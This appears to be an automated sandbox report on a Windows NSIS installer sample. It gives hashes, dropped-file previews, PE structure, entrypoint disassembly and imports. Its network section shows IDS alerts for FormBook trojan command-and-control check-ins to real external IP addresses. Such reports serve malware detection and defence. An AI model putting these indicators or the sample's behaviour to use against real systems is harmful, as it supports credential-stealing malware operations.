                                        SSDEEP:192:dZ0sW/87yXEweaM8tpic2SGGfMIyUlj0wggbxIrfmsxiS:dZ0sw87zjBspic2SGGR1lj0wgoxI3J
                                        MD5:7721863171BA672F3F660981C836E35B
                                        SHA1:6F7A2C0D30D51CA6B31F0FCC803D58100D1D54BE
                                        SHA-256:290F31B8FB70C5E745918DF19CF3A2DD3E7D368A2BC5D9C79611D004AB2AC9D8
                                        SHA-512:0474541FFE562D37BB638EA5500189F4E093E59A6CE8F4039E1BDD4FFB4EF7CBFA18D6850F81DA416DCF91BA40836C73684BE405091708351F5ACD00DD27CC3C
                                        Malicious:false
                                        Preview:.^.....H..........Q..C...........5...>.....6`d.................h7..@...v.......O........'...:....y......".....D.<......p.....)...........1.....x............~..........m......'.4..Y..s..a.,.....8.......{....................,.....f.g.............j.+q..=....~.................A..6..kN.....w.P...E....................P..S....6*...P,.\.....X........."....."....7......................7........-.....5F%C..~H.........[^........C^......h.B....6o..-.gj......u.F...r...!.Xb........h.....,'......$..b............>t...X.x...vh..........5...y......A.y...y...Q...@......O......v.......W......2...I..............1b..a...?......v\.......v........ ........M.4........ .-6+.......\./.........G..........k..h....Z.=..........*X....N.............+........u...............=gE.r...........w.......F\...............{....5.......:.....b.......".......k.............d.(..i...Q.....<.....a.j...C........<....b..........Z........................~13...^B.......#....z6..R...a........Ny|.......|.....z..c..Y........)

                                        C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\hyperalgebra.txt

                                        Download File
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):592
                                        Entropy (8bit):4.204861403479884
                                        Encrypted:false
                                        SSDEEP:12:PjO2xFPAeLUzV3ByBRCs+4LlMvJLHYEEHaBAH2s2N+k/+IQI:PiOF3UzlByBRCsVGtYEYWsY+E+IQI
                                        MD5:8097E08408C796656D6FBE5B4011609A
                                        SHA1:234444944CBE5C50C7DC38FD51C565CCA3276164
                                        SHA-256:24677BD64BDFB8D904A096D013232993C005856ED59AA5FFBE504EB4F761CD75
                                        SHA-512:127264BCA9489E3CEF728204AA128E705730513025E8B7E0F8464ABE5D0EDEE3FC8D5043E4DA7D8A67A3A115AEF7237BC04C6CD5CD956923AFC1921FD3D29638
                                        Malicious:false
                                        Preview:gasterozooid blottedes undershrievery reorientation konsistoriemedlems dokumentdisketten brevstemmende defilerede studiekammerater forstuvelsens..metastrophic kabiet serb aflbsrens ordmnstrets simulatoropgave tholes,frygtlse cloudlessly fylderiets kpheste isabelles unsalvageably appelerer optics infralyd theligonaceae suspensively..snerp separatkabinettet paralegal xenofobiernes chervante stivelseskorn achromobacterieae,brygmester brevaabners kontraheredes pullulated musketerens studentereksamener poliad,underarmsmusklen askorbinsyretabletten backtracks stvises termcap kinoorgels trog.

                                        C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\jaqueline.bow

                                        Download File
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15062
                                        Entropy (8bit):4.9357451772131204
                                        Encrypted:false
                                        SSDEEP:384:pl7QxurtO8pawzlNSBjw6YhtRK61R1f7W0:P7QxuhO8pawgwXR1TW0
                                        MD5:56013432CE9F5F20196ED4D8766EB72A
                                        SHA1:4DF3B7CDFFD65DD9D14BB212080C608703906554
                                        SHA-256:71341213976B73E52A10998CCB06599C8EDC6E7D12E3338927FE56E5DABAE760
                                        SHA-512:C8BB9713C4E9B7CB95C452FA8E112B0C11A92F7C3661D902E50B51552981AB60404E5D84FB3CFC7B4794963C06E3B0E73892794CDAAF95846B8B67B838AE384A
                                        Malicious:false
                                        Preview:....u..p...!.ht~.......L................/y...................G8.....R..}.......;..............%...-.......L.?.b......................'3S......P.#..F....&...v.B.I.....H#........q......7..........d.o....fA......B..T9.........7....y....>.....>............}...........Q....h......_......F.V.CWA.........~..f....K..........................n............C.)...l../......9.....,...........a...$.......p....S........x......-....... =...A.....4'.S.~../t..Mm...........[j..7........f..c....s........._.............. ...5M.H.pW...../........=....}........'d.....Z..7..........;....^....l...^............8............:....4.........R@^........U............@.........~..*.Jh..Qf.{..i...n..........a.. .....D.......a.............z......@m../.ft.........^.........d...H......#.......-._...$........._...a...................................E...........R.?........Nn....1.........R..>.E...J..........j...........]........#............3.|...........Y.2.J.*_cH....7T...........1.~..H..."u.....\..........u.

                                        C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\macroconidium.fan

                                        Download File
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:OpenPGP Public Key
                                        Category:dropped
                                        Size (bytes):13588
                                        Entropy (8bit):4.923594985159061
                                        Encrypted:false
                                        SSDEEP:192:JwxK7lxC6+88oXtWeJvBdfUW8aZcrZFb0IDAeXBZ3QHju4LEFdTKUAZNW:Jd+6+88neJvB78aiZZDDXBZADu4LaSZQ
                                        MD5:A1BB2C0226A81753C3C2F6FA6562B6F3
                                        SHA1:EDC6ECAFA090B95F7B4A3E3B26A6A4E5539D932B
                                        SHA-256:F89E9A19B6D6A219D9AAC39623DC5C30CFEA6519CC7376E18656A5A7C999DC53
                                        SHA-512:26695DBF9FDE77625A12BE1F12797DF821B8B20204D4BE58D5E43E27159908D7AFBA4ADAA1B39438D931C076854877B3008A4F12CE984053C877D5C89E15F000
                                        Malicious:false
                                        Preview:..........W.......(..........Y.Ir...G.........z.#..>%...#........t..v+....3......ug|{K.............f.7...............8.........N$...............................C....<....P..b............o....(R.d.._...x...2.............b..>...j........^..Q..p...)....&.....&....S......A..<....X."...%....f)......O...........f.{...)................m.....!..M.J..e..8.............._..<.~.X...Y6..../........x....Y.a..,....................5....k9................B.......A...............t.......m.....?.....aU..V..'........v..C.N....=+.D...{..?f<...........(.&..z...~.....8...^...Z..x.......;%H....r...j.&..........'........h~......t.f......3...............=...@.7.......|...l.......0.......y.N...w..........l....Z...K.|............*.........-...TS.|.O..4.x....;........Y..E...............Q............k.l.../..?82....................F.....^.N...X|....@....8.(........U.(.......t*......a.........<?..w....4.e..5....,............../..y..Z...i..P(.....`.^.......'......G.}.....\...............8..F.........

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.9509411156021095
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:ulACwpUCSU.exe
                                        File size:627'775 bytes
                                        MD5:b6f8b1c89399490857facfcf5bb78d86
                                        SHA1:898e59e55c027c47833f435fff28ed20da9ecdc8
                                        SHA256:c4c7ed9360322bf463828c0e86a131a081ecc700fe32dc0215d392251771a6de
                                        SHA512:5b1539c96bfe2e04844dcceb36cfe5f9891b45e8fa0419c5ba80deca6624912717949a6650e364ce467fa777803fa87768eb923db7f2c82d3d671f5e7f398095
                                        SSDEEP:12288:2K9/JmMgq+TiZFJVsTej3s1XmPUMLyAetbdrjkcifO+aMs+s:tj+TirqejomPUzNVZkcirass
                                        TLSH:3AD422A263D1C06FE055677AD9A2D7FBE1159C66D836470B2F117FBA3C761038E0B222
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................^...........2.......p....@

                                        File Icon

                                        Icon Hash:4740490d27a52145

                                        Static PE Info

                                        General

                                        Entrypoint:0x403217
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x55C15CE3 [Wed Aug 5 00:46:27 2015 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push ebp
                                        push esi
                                        xor ebx, ebx
                                        push edi
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 00409130h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [00407034h]
                                        push 00008001h
                                        call dword ptr [004070B4h]
                                        push ebx
                                        call dword ptr [0040728Ch]
                                        push 00000009h
                                        mov dword ptr [004237B8h], eax
                                        call 00007FD920B9352Ah
                                        mov dword ptr [00423704h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 0041ECB8h
                                        call dword ptr [00407164h]
                                        push 004091E4h
                                        push 00422F00h
                                        call 00007FD920B931D4h
                                        call dword ptr [004070B0h]
                                        mov ebp, 00429000h
                                        push eax
                                        push ebp
                                        call 00007FD920B931C2h
                                        push ebx
                                        call dword ptr [00407118h]
                                        cmp byte ptr [00429000h], 00000022h
                                        mov dword ptr [00423700h], eax
                                        mov eax, ebp
                                        jne 00007FD920B9072Ch
                                        mov byte ptr [esp+14h], 00000022h
                                        mov eax, 00429001h
                                        push dword ptr [esp+14h]
                                        push eax
                                        call 00007FD920B92C52h
                                        push eax
                                        call dword ptr [00407220h]
                                        mov dword ptr [esp+1Ch], eax
                                        jmp 00007FD920B907E5h
                                        cmp cl, 00000020h
                                        jne 00007FD920B90728h
                                        inc eax
                                        cmp byte ptr [eax], 00000020h
                                        je 00007FD920B9071Ch

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x2b6d8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x5c3a0x5e00e5e7adda692e6e028f515fe3daa2b69fFalse0.658951130319149data6.410406825129756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x90000x1a7f80x400cc58d0a55ac015d8f1470ea90f440596False0.615234375data5.02661163746607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x240000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x380000x2b6d80x2b800b6d42514c2cc09fb8e6265d6a2c193e7False0.9366244612068966data7.857509251924338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x384180x18ef9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000401421619981
                                        RT_ICON0x513180x833dPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9935410899782718
                                        RT_ICON0x596580x350cPNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States1.0008100147275405
                                        RT_ICON0x5cb680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6025933609958506
                                        RT_ICON0x5f1100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6329737335834896
                                        RT_ICON0x601b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.7006929637526652
                                        RT_ICON0x610600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7924187725631769
                                        RT_ICON0x619080x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5280487804878049
                                        RT_ICON0x61f700x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7109826589595376
                                        RT_ICON0x624d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7225177304964538
                                        RT_ICON0x629400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6854838709677419
                                        RT_ICON0x62c280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7263513513513513
                                        RT_DIALOG0x62d500x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x62e500x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x62f700xc4dataEnglishUnited States0.5918367346938775
                                        RT_DIALOG0x630380x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x630980xaedataEnglishUnited States0.6264367816091954
                                        RT_VERSION0x631480x24cdataEnglishUnited States0.5255102040816326
                                        RT_MANIFEST0x633980x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                        Imports

                                        DLLImport
                                        KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                        USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        06/04/24-14:37:17.421441TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983480192.168.11.3023.82.12.29
                                        06/04/24-14:39:57.709410TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987980192.168.11.30217.70.184.50
                                        06/04/24-14:35:10.111073TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980280192.168.11.30160.124.114.188
                                        06/04/24-14:35:51.616479TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981480192.168.11.30162.0.237.22
                                        06/04/24-14:41:09.241153TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988880192.168.11.3091.195.240.19
                                        06/04/24-14:34:54.577597TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979880192.168.11.3034.120.137.41
                                        06/04/24-14:38:09.145692TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984780192.168.11.3091.195.240.19
                                        06/04/24-14:41:37.239459TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989380192.168.11.30162.0.237.22
                                        06/04/24-14:37:31.388113TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983880192.168.11.3091.195.240.19
                                        06/04/24-14:42:10.001607TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989980192.168.11.30104.21.63.61
                                        06/04/24-14:40:58.461569TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988780192.168.11.3085.159.66.93
                                        06/04/24-14:41:25.629315TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989180192.168.11.3091.195.240.19
                                        06/04/24-14:35:37.881933TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981080192.168.11.30172.67.205.56
                                        06/04/24-14:41:48.028067TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989580192.168.11.3023.227.38.74
                                        06/04/24-14:41:53.435539TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989780192.168.11.30217.70.184.50
                                        06/04/24-14:36:33.301646TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982680192.168.11.30217.70.184.50
                                        06/04/24-14:37:03.609123TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983080192.168.11.3091.195.240.19
                                        06/04/24-14:38:00.679065TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984680192.168.11.30192.207.62.21
                                        06/04/24-14:35:24.278240TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980680192.168.11.3091.195.240.19
                                        06/04/24-14:36:19.073798TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982280192.168.11.3023.227.38.74
                                        06/04/24-14:41:20.072336TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989080192.168.11.30160.124.114.188
                                        06/04/24-14:38:50.305812TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985980192.168.11.3091.195.240.19
                                        06/04/24-14:39:03.630338TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24986380192.168.11.30172.67.205.56
                                        06/04/24-14:40:43.956228TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988380192.168.11.30192.207.62.21
                                        06/04/24-14:41:14.601763TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24988980192.168.11.3034.120.137.41
                                        06/04/24-14:41:31.000835TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989280192.168.11.30172.67.205.56
                                        06/04/24-14:38:22.421737TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985180192.168.11.3034.120.137.41
                                        06/04/24-14:34:31.075062TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979480192.168.11.3091.195.240.19
                                        06/04/24-14:39:30.783165TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987180192.168.11.3064.190.62.22
                                        06/04/24-14:42:04.181429TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989880192.168.11.30104.194.9.31
                                        06/04/24-14:39:44.071584TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24987580192.168.11.3023.227.38.74
                                        06/04/24-14:37:45.221573TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984280192.168.11.30162.240.81.18
                                        06/04/24-14:38:36.478189TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985580192.168.11.30160.124.114.188
                                        06/04/24-14:41:42.655120TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24989480192.168.11.3064.190.62.22
                                        06/04/24-14:36:05.512490TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981880192.168.11.3064.190.62.22
                                        06/04/24-14:39:17.115878TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24986780192.168.11.30162.0.237.22

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 4, 2024 14:34:03.236177921 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.236196995 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.236376047 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.252441883 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.252448082 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.532784939 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.532973051 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.532973051 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.533478022 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.533622980 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.573182106 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.573190928 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.573492050 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.573637962 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.578135967 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.620218992 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.833255053 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.833329916 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.833416939 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.833452940 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.833616972 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.833616972 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:03.833627939 CEST44349792142.250.217.174192.168.11.30
                                        Jun 4, 2024 14:34:03.833823919 CEST49792443192.168.11.30142.250.217.174
                                        Jun 4, 2024 14:34:04.011207104 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.011224985 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.011465073 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.011743069 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.011754036 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.294821978 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.295068026 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.295228004 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.299113035 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.299122095 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.299403906 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.299573898 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.299983978 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.340225935 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.968014956 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.968178034 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.968252897 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.986773014 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.986974955 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.986974955 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.996375084 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:04.996546984 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:04.996546984 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.006004095 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.006189108 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.006200075 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.006422997 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.099365950 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.099569082 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.099580050 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.099781036 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.104059935 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.104243994 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.104254007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.104461908 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.113641024 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.113850117 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.113859892 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.114135027 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.123218060 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.123428106 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.123439074 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.123712063 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.132797003 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.133004904 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.133016109 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.133285999 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.142363071 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.142570972 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.142581940 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.142849922 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.151962996 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.152102947 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.152112007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.152349949 CEST49793443192.168.11.30142.250.217.193
